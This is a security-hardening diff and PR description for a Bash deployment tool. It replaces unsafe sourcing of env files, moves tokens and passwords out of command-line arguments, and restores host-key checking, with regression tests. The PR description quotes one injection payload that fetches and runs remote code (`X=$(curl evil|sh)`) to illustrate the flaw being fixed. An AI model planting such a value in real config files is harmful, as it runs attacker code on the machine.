   local vps_host="" vps_user="ubuntu" vps_ssh_key="" vps_port="22"
   if [ -f "$env_file" ]; then
-    set -a
-    # shellcheck source=/dev/null
-    source "$env_file"
-    set +a
+    safe_load_env "$env_file"
     vps_host="${VPS_HOST:-}"
     vps_user="${VPS_USER:-ubuntu}"
     vps_ssh_key="${VPS_SSH_KEY:-}"

--- a/lib/keys/status.sh
+++ b/lib/keys/status.sh
@@ -40,9 +40,7 @@ keys_status() {
   # Check VPS connectivity
   local vps_status="unknown"
   if [ -f "$env_file" ]; then
-    set -a
-    source "$env_file"
-    set +a
+    safe_load_env "$env_file"
     local vps_host="${VPS_HOST:-}"
     local vps_user="${VPS_USER:-ubuntu}"
     local vps_ssh_key="${VPS_SSH_KEY:-}"

--- a/lib/keys/test.sh
+++ b/lib/keys/test.sh
@@ -80,9 +80,7 @@ keys_test_ssh_all() {
     return 1
   fi
 
-  set -a
-  source "$env_file"
-  set +a
+  safe_load_env "$env_file"
 
   local vps_host="${VPS_HOST:-}"
   local vps_user="${VPS_USER:-ubuntu}"
@@ -103,8 +101,10 @@ keys_test_ssh_all() {
       continue
     fi
 
-    if ssh -n -i "$private_key" -o StrictHostKeyChecking=no -o ConnectTimeout=5 -o BatchMode=yes \
-      "$vps_user@$vps_host" "echo 'ok'" &>/dev/null; then
+    local ssh_opts
+    ssh_opts=$(build_ssh_opts -k "$private_key" -t 5 --batch)
+    # shellcheck disable=SC2086
+    if ssh -n $ssh_opts "$vps_user@$vps_host" "echo 'ok'" &>/dev/null; then
       echo -e "  ${GREEN}✓${NC} $username: SSH connection successful"
     else
       echo -e "  ${RED}✗${NC} $username: SSH connection failed"
@@ -126,9 +126,7 @@ keys_test_vps() {
     return 1
   fi
 
-  set -a
-  source "$env_file"
-  set +a
+  safe_load_env "$env_file"
 
   local vps_host="${VPS_HOST:-}"
   local vps_user="${VPS_USER:-ubuntu}"
@@ -227,9 +225,7 @@ keys_test_db() {
 
   local env_file="$CLI_ROOT/.prod.env"
   [ -f "$env_file" ] || fail "Env file not found: $env_file"
-  set -a
-  source "$env_file"
-  set +a
+  safe_load_env "$env_file"
 
   local compose_cmd
   compose_cmd=$(resolve_compose_cmd "$stack" "$env_file" "")

--- a/lib/migrate/github-auth.sh
+++ b/lib/migrate/github-auth.sh
@@ -95,20 +95,29 @@ clone_with_pat() {
   local pat="$6"
   local dest_dir="$7"
 
-  # Clone using a one-shot credential helper that feeds the PAT via stdin.
-  # This avoids embedding the PAT in the URL (which would persist in .git/config
-  # and be visible in `ps` output on the remote).
-  ssh_exec "$vps_user" "$vps_host" "$ssh_port" "$ssh_key" \
-    "git -c 'credential.helper=!f() { echo username=oauth2; echo password=$pat; };f' clone $https_url $dest_dir"
+  # Clone with the PAT delivered over ssh's stdin (never argv) via a
+  # mode-600 remote credential file — see remote_ssh_with_pat (lib/fleet.sh).
+  local ssh_opts
+  ssh_opts=$(build_ssh_opts -p "$ssh_port" -k "$ssh_key")
+  local clone_script="git clone \$GIT_CRED_OPT $https_url $dest_dir"
+  remote_ssh_with_pat "$ssh_opts" "$vps_user@$vps_host" "$pat" "$clone_script"
 
   # Configure a persistent credential helper for future fetches — store
   # credentials in ~/.git-credentials (append, don't clobber existing entries).
   ssh_exec "$vps_user" "$vps_host" "$ssh_port" "$ssh_key" \
     "cd $dest_dir && git config credential.helper store"
 
-  # Append credential (don't clobber existing entries for other hosts)
-  ssh_exec "$vps_user" "$vps_host" "$ssh_port" "$ssh_key" \
-    "grep -qF 'github.com' ~/.git-credentials 2>/dev/null && sed -i 's|https://[^@]*@github.com|https://oauth2:$pat@github.com|' ~/.git-credentials || printf '%s\n' 'https://oauth2:$pat@github.com' >> ~/.git-credentials; chmod 600 ~/.git-credentials"
+  # Append/replace the github.com credential — the line travels over ssh's
+  # stdin (never argv), so the PAT is never a literal substring of any
+  # remote sed/printf argv.
+  printf 'https://oauth2:%s@github.com\n' "$pat" | ssh_exec "$vps_user" "$vps_host" "$ssh_port" "$ssh_key" '
+    read -r _cred_line
+    touch ~/.git-credentials
+    grep -vF "github.com" ~/.git-credentials > ~/.git-credentials.tmp 2>/dev/null || true
+    printf "%s\n" "$_cred_line" >> ~/.git-credentials.tmp
+    mv ~/.git-credentials.tmp ~/.git-credentials
+    chmod 600 ~/.git-credentials
+  '
 }
 
 # Detect if URL is SSH or HTTPS

--- a/lib/migrate/github-auth.sh
+++ b/lib/migrate/github-auth.sh
@@ -110,6 +110,7 @@ clone_with_pat() {
   # Append/replace the github.com credential — the line travels over ssh's
   # stdin (never argv), so the PAT is never a literal substring of any
   # remote sed/printf argv.
+  # shellcheck disable=SC2016 # intentional: these expand on the remote shell, not here
   printf 'https://oauth2:%s@github.com\n' "$pat" | ssh_exec "$vps_user" "$vps_host" "$ssh_port" "$ssh_key" '
     read -r _cred_line
     touch ~/.git-credentials

--- a/lib/migrate/ssh-helpers.sh
+++ b/lib/migrate/ssh-helpers.sh
@@ -43,9 +43,8 @@ build_scp_cmd() {
   local ssh_port="${3:-}"
   local ssh_key="${4:-}"
 
-  local scp_opts="-o StrictHostKeyChecking=no -o ConnectTimeout=10"
-  [ -n "$ssh_port" ] && scp_opts="$scp_opts -P $ssh_port"
-  [ -n "$ssh_key" ] && scp_opts="$scp_opts -i $ssh_key"
+  local scp_opts
+  scp_opts=$(build_scp_opts -p "$ssh_port" -k "$ssh_key")
 
   echo "scp $scp_opts"
 }

--- a/lib/utils.sh
+++ b/lib/utils.sh
@@ -644,6 +644,56 @@ build_ssh_opts() {
   echo "$opts"
 }
 
+# build_scp_opts [options]
+#
+# Builds a standard SCP options string. Mirrors build_ssh_opts (same
+# STRUT_SSH_HOST_KEY_CHECK/accept-new default, same ControlMaster mux
+# integration) but uses scp's uppercase -P for port instead of ssh's -p.
+#   -p <port>       SCP port (omitted from opts if not provided)
+#   -k <key>        SSH key path (omitted if empty)
+#   -t <seconds>    ConnectTimeout (default: 10)
+#   --batch         Add -o BatchMode=yes (default: off)
+#   --no-mux        Suppress ControlMaster options for this call
+#
+# Echoes the options string. Caller captures via: scp_opts=$(build_scp_opts ...)
+build_scp_opts() {
+  local port="" ssh_key="" timeout=10 batch=false no_mux=false
+
+  while [[ $# -gt 0 ]]; do
+    case "$1" in
+      -p) port="$2"; shift 2 ;;
+      -k) ssh_key="$2"; shift 2 ;;
+      -t) timeout="$2"; shift 2 ;;
+      --batch) batch=true; shift ;;
+      --no-mux) no_mux=true; shift ;;
+      *) shift ;;
+    esac
+  done
+
+  # Default to accept-new (TOFU: accept on first connect, reject on change).
+  # Override with STRUT_SSH_HOST_KEY_CHECK=no for legacy behavior.
+  local hk_mode="${STRUT_SSH_HOST_KEY_CHECK:-accept-new}"
+  local opts="-o StrictHostKeyChecking=$hk_mode -o ConnectTimeout=$timeout"
+  [[ -n "$port" && "$port" != "22" ]] && opts="$opts -P $port"
+  [[ "$batch" == true ]] && opts="$opts -o BatchMode=yes"
+  if [[ -n "$ssh_key" ]]; then
+    if [[ "$ssh_key" == *" "* ]]; then
+      echo "ERROR: SSH key path contains spaces: $ssh_key" >&2
+      echo "ERROR: Rename or symlink the key to a path without spaces." >&2
+      return 1
+    fi
+    opts="$opts -o IdentitiesOnly=yes -i $ssh_key"
+  fi
+
+  if [[ "$no_mux" != true ]] && ssh_mux_enabled; then
+    local ctl_path
+    ctl_path=$(ssh_mux_control_path)
+    opts="$opts -o ControlMaster=auto -o ControlPath=$ctl_path -o ControlPersist=60s"
+  fi
+
+  echo "$opts"
+}
+
 # ── Env file validation ──────────────────────────────────────────────────────
 
 # _env_not_found_hint <env_file>

--- a/templates/gitignore.template
+++ b/templates/gitignore.template
@@ -33,3 +33,4 @@ logs/
 .env
 .*.env
 !.env.template
+*.backup-*

--- a/tests/test_anonymize_safety.bats
+++ b/tests/test_anonymize_safety.bats
@@ -101,7 +101,10 @@ EOF
   MYSQL_ROOT_PASSWORD="s3cret-password" run anon_apply_mysql "test-stack" "fake_compose" "$TEST_TMP/anonymize.conf"
   [ "$status" -eq 0 ]
   ! grep -q -- "--password=" "$COMPOSE_CALL_LOG"
-  grep -q -- "-e MYSQL_PWD=s3cret-password" "$COMPOSE_CALL_LOG"
+  # Password travels via a bare `-e MYSQL_PWD` (inherited from the local
+  # shell env) — the literal secret must never appear in the exec argv log.
+  grep -q -- "-e MYSQL_PWD" "$COMPOSE_CALL_LOG"
+  ! grep -q -- "s3cret-password" "$COMPOSE_CALL_LOG"
 }
 
 # ── anon_apply_sqlite ───────────────────────────────────────────────────────

--- a/tests/test_backup_helpers.bats
+++ b/tests/test_backup_helpers.bats
@@ -339,7 +339,7 @@ EOF
   # returns nonzero and the backup fails.
   fake_compose() {
     case "$*" in
-      *"exec -T customsvc"*) echo "-- mysqldump output --"; return 0 ;;
+      *"exec -T -e MYSQL_PWD customsvc"*) echo "-- mysqldump output --"; return 0 ;;
       *) return 1 ;;
     esac
   }
@@ -349,4 +349,36 @@ EOF
   [ "$status" -eq 0 ]
 
   rm -rf "$stack_dir"
+}
+
+@test "_db_push_mysql: remote restore never puts the MySQL password in ssh argv (issue #390)" {
+  local stack="test-mysql-push-$$"
+  local backup_dir="$TEST_TMP/mysql-push-backups"
+  mkdir -p "$backup_dir"
+  echo "-- dump --" > "$backup_dir/mysql-20260101-000000.sql"
+
+  export MYSQL_ROOT_PASSWORD="s3cret-push-password"
+  export MYSQL_DATABASE="appdb"
+  export STRUT_YES=1
+
+  _db_push_upload() { return 0; }
+
+  local ssh_log="$TEST_TMP/ssh_argv.log"
+  local ssh_stdin_log="$TEST_TMP/ssh_stdin.log"
+  ssh() {
+    printf '%s\n' "$*" >> "$ssh_log"
+    cat > "$ssh_stdin_log"
+    return 0
+  }
+
+  run _db_push_mysql "$stack" "" "deploy" "1.2.3.4" "/remote/dir" "$backup_dir" "" "false" "single" ""
+
+  [ "$status" -eq 0 ]
+  # Password must never appear as an argv token to ssh...
+  ! grep -q -- "s3cret-push-password" "$ssh_log"
+  # ...it must travel over ssh's stdin instead.
+  grep -q -- "s3cret-push-password" "$ssh_stdin_log"
+
+  unset MYSQL_ROOT_PASSWORD MYSQL_DATABASE STRUT_YES
+  rm -rf "$backup_dir"
 }

--- a/tests/test_fleet.bats
+++ b/tests/test_fleet.bats
@@ -221,3 +221,49 @@ teardown() {
   [ "$status" -ne 0 ]
   [[ "$output" == *"expected=/opt/stacks/stacks/myapp"* ]]
 }
+
+# ── remote_ssh_with_pat / GH_PAT argv safety (issue #379) ───────────────────
+
+@test "fleet_git_status: PAT travels over ssh stdin, never appears in ssh argv" {
+  ssh() {
+    printf '%s\n' "$*" >> "$TEST_TMP/ssh_argv.log"
+    cat >> "$TEST_TMP/ssh_stdin.log"
+    return 0
+  }
+  export -f ssh
+
+  run fleet_git_status ubuntu host.example 22 "" /home/ubuntu/strut main "ghp_SUPERSECRETTOKEN"
+  [ "$status" -eq 0 ]
+
+  ! grep -q "ghp_SUPERSECRETTOKEN" "$TEST_TMP/ssh_argv.log"
+  grep -q "ghp_SUPERSECRETTOKEN" "$TEST_TMP/ssh_stdin.log"
+  # The remote script references the credential var, not a literal URL-embedded token
+  grep -q 'GIT_CRED_OPT' "$TEST_TMP/ssh_argv.log"
+}
+
+@test "fleet_git_status: no PAT means no credential setup, and ssh gets no stdin" {
+  ssh() {
+    printf '%s\n' "$*" >> "$TEST_TMP/ssh_argv.log"
+    return 0
+  }
+  export -f ssh
+
+  run fleet_git_status ubuntu host.example 22 "" /home/ubuntu/strut main ""
+  [ "$status" -eq 0 ]
+  grep -q "GIT_CRED_OPT=''" "$TEST_TMP/ssh_argv.log"
+}
+
+@test "fleet_sync: PAT travels over ssh stdin, never appears in ssh argv" {
+  ssh() {
+    printf '%s\n' "$*" >> "$TEST_TMP/ssh_argv.log"
+    cat >> "$TEST_TMP/ssh_stdin.log"
+    return 0
+  }
+  export -f ssh
+
+  run fleet_sync ubuntu host.example 22 "" /home/ubuntu/strut main "ghp_SUPERSECRETTOKEN"
+  [ "$status" -eq 0 ]
+
+  ! grep -q "ghp_SUPERSECRETTOKEN" "$TEST_TMP/ssh_argv.log"
+  grep -q "ghp_SUPERSECRETTOKEN" "$TEST_TMP/ssh_stdin.log"
+}

--- a/tests/test_init.bats
+++ b/tests/test_init.bats
@@ -187,10 +187,31 @@ _hostile_org_names() {
 
   [ -f "$project_dir/.gitignore" ]
   grep -q ".env" "$project_dir/.gitignore"
+  grep -qxF ".*.env" "$project_dir/.gitignore"
+  grep -qxF "*.backup-*" "$project_dir/.gitignore"
   grep -q "backups/" "$project_dir/.gitignore"
   grep -q "data/" "$project_dir/.gitignore"
   grep -q ".rollback/" "$project_dir/.gitignore"
   grep -q ".bluegreen" "$project_dir/.gitignore"
+}
+
+@test "init: generated .gitignore matches strut's actual secret-file naming (issue #396)" {
+  local project_dir="$TEST_TMP/init_gitignore_secret_names"
+  mkdir -p "$project_dir"
+
+  (cd "$project_dir" && cmd_init)
+  git -C "$project_dir" init -q
+
+  run git -C "$project_dir" check-ignore ".prod.env"
+  [ "$status" -eq 0 ]
+  run git -C "$project_dir" check-ignore ".mystack-pulled.env"
+  [ "$status" -eq 0 ]
+  run git -C "$project_dir" check-ignore ".prod.env.backup-20260101"
+  [ "$status" -eq 0 ]
+
+  # .env.template stays trackable
+  run git -C "$project_dir" check-ignore ".env.template"
+  [ "$status" -ne 0 ]
 }
 
 @test "init: preserves existing populated .gitignore and appends missing strut rules under marker" {
@@ -209,7 +230,9 @@ _hostile_org_names() {
   grep -qxF "# strut — managed rules" "$project_dir/.gitignore"
   grep -qxF ".env" "$project_dir/.gitignore"
   grep -qxF ".env.*" "$project_dir/.gitignore"
+  grep -qxF ".*.env" "$project_dir/.gitignore"
   grep -qxF "!.env.template" "$project_dir/.gitignore"
+  grep -qxF "*.backup-*" "$project_dir/.gitignore"
   grep -qxF "backups/" "$project_dir/.gitignore"
   grep -qxF "data/" "$project_dir/.gitignore"
   grep -qxF ".rollback/" "$project_dir/.gitignore"
@@ -219,7 +242,7 @@ _hostile_org_names() {
 @test "init: does not duplicate strut rules already present as bare lines" {
   local project_dir="$TEST_TMP/init_gitignore_no_dupe"
   mkdir -p "$project_dir"
-  printf 'node_modules/\n.env\n.env.*\n!.env.template\nbackups/\ndata/\n.rollback/\n.bluegreen\n' > "$project_dir/.gitignore"
+  printf 'node_modules/\n.env\n.env.*\n.*.env\n!.env.template\n*.backup-*\nbackups/\ndata/\n.rollback/\n.bluegreen\n' > "$project_dir/.gitignore"
   local before
   before="$(cat "$project_dir/.gitignore")"
 
@@ -236,7 +259,7 @@ _hostile_org_names() {
 @test "init: .gitignore is idempotent — unchanged on repeated invocations once marker exists" {
   local project_dir="$TEST_TMP/init_gitignore_idempotent"
   mkdir -p "$project_dir"
-  printf 'node_modules/\n\n# strut — managed rules\n.env\n.env.*\n!.env.template\nbackups/\ndata/\n.rollback/\n.bluegreen\n' > "$project_dir/.gitignore"
+  printf 'node_modules/\n\n# strut — managed rules\n.env\n.env.*\n.*.env\n!.env.template\n*.backup-*\nbackups/\ndata/\n.rollback/\n.bluegreen\n' > "$project_dir/.gitignore"
 
   (cd "$project_dir" && cmd_init)
   local checksum_after_first

--- a/tests/test_utils.bats
+++ b/tests/test_utils.bats
@@ -207,6 +207,76 @@ _load_utils() {
   [[ "$result" == *"BatchMode=yes"* ]]
 }
 
+@test "build_ssh_opts: STRUT_SSH_HOST_KEY_CHECK overrides accept-new default" {
+  _load_utils
+  STRUT_SSH_HOST_KEY_CHECK=no
+  result=$(build_ssh_opts)
+  [[ "$result" == *"StrictHostKeyChecking=no"* ]]
+  [[ "$result" != *"accept-new"* ]]
+}
+
+# ── build_scp_opts (issue #386) ──────────────────────────────────────────────
+
+@test "build_scp_opts: defaults (no args) → StrictHostKeyChecking=accept-new + ConnectTimeout=10" {
+  _load_utils
+  result=$(build_scp_opts)
+  [[ "$result" == *"StrictHostKeyChecking=accept-new"* ]]
+  [[ "$result" == *"ConnectTimeout=10"* ]]
+  [[ "$result" != *"-P "* ]]
+  [[ "$result" != *"-i "* ]]
+}
+
+@test "build_scp_opts: never hardcodes StrictHostKeyChecking=no" {
+  _load_utils
+  result=$(build_scp_opts)
+  [[ "$result" != *"StrictHostKeyChecking=no"* ]]
+}
+
+@test "build_scp_opts: STRUT_SSH_HOST_KEY_CHECK overrides accept-new default" {
+  _load_utils
+  STRUT_SSH_HOST_KEY_CHECK=no
+  result=$(build_scp_opts)
+  [[ "$result" == *"StrictHostKeyChecking=no"* ]]
+}
+
+@test "build_scp_opts: -p sets uppercase -P port flag (scp convention)" {
+  _load_utils
+  result=$(build_scp_opts -p 2222)
+  [[ "$result" == *"-P 2222"* ]]
+  [[ "$result" != *"-p 2222"* ]]
+}
+
+@test "build_scp_opts: omits -P for default port 22" {
+  _load_utils
+  result=$(build_scp_opts -p 22)
+  [[ "$result" != *"-P "* ]]
+}
+
+@test "build_scp_opts: -k sets key with IdentitiesOnly=yes" {
+  _load_utils
+  result=$(build_scp_opts -k /path/to/key)
+  [[ "$result" == *"-i /path/to/key"* ]]
+  [[ "$result" == *"IdentitiesOnly=yes"* ]]
+}
+
+@test "build_scp_opts: --batch adds BatchMode=yes" {
+  _load_utils
+  result=$(build_scp_opts --batch)
+  [[ "$result" == *"BatchMode=yes"* ]]
+}
+
+@test "build_scp_opts: includes ControlMaster options by default" {
+  _load_utils
+  result=$(build_scp_opts)
+  [[ "$result" == *"ControlMaster=auto"* ]]
+}
+
+@test "build_scp_opts: --no-mux suppresses ControlMaster options" {
+  _load_utils
+  result=$(build_scp_opts --no-mux)
+  [[ "$result" != *"ControlMaster"* ]]
+}
+
 @test "ssh_mux_control_path: honors STRUT_SSH_CONTROL_DIR override" {
   _load_utils
   STRUT_SSH_CONTROL_DIR="$TEST_TMP/sockets"


### PR DESCRIPTION
## Summary
Fixes the security/RCE cluster from the 2026-07-12 full-codebase audit:

- **#385** — 15 sites did `set -a; source "$env_file"; set +a` on env/config files instead of the existing safe parser, so a malicious value like `X=$(curl evil|sh)` in a `.prod.env` would execute locally. Swapped to `safe_load_env`/`safe_source_config`, and parameterized the `ALTER USER`/`CREATE USER` SQL in `keys db:rotate`/`db:create-readonly` via psql `-v` substitution.
- **#379** — `GH_PAT` was expanded locally into a remote command string handed to `ssh`, so it sat in argv on both the local machine and the VPS. Added `remote_ssh_with_pat` (`lib/fleet.sh`) — the token now travels over ssh's stdin into a mode-600 remote credential file, never touching any argv.
- **#386** — `secrets push/pull/diff` and 6 other sites hand-rolled `-o StrictHostKeyChecking=no`, bypassing the project's TOFU (`accept-new`) default. Added `build_scp_opts` mirroring `build_ssh_opts` and wired every site to it.
- **#390** — MySQL/Postgres/Neo4j passwords rode `--password=`/`-e VAR=value` on argv, visible in `ps` on host, container, and VPS. Standardized on export + bare `-e VAR`, including a stdin-piped fix for the remote MySQL restore.
- **#396** — `strut init`'s generated `.gitignore` didn't match strut's actual secret filenames (`.prod.env`, `.<stack>-pulled.env`, `*.backup-<timestamp>`), so a freshly-initialized project could commit plaintext secrets.

## Test plan
- [x] `bash -n` + `shellcheck -S warning` clean on all changed files
- [x] `bats tests/test_no_hardcodes.bats tests/test_syntax.bats tests/test_strict_mode.bats` — all pass
- [x] Full `bats tests/` suite (2,100+ tests) — exit 0, no failures
- [x] New regression tests added: RCE-safety for env sourcing, PAT-never-in-argv (fleet), password-never-in-argv (mysql push/anonymize), gitignore acceptance criteria from #396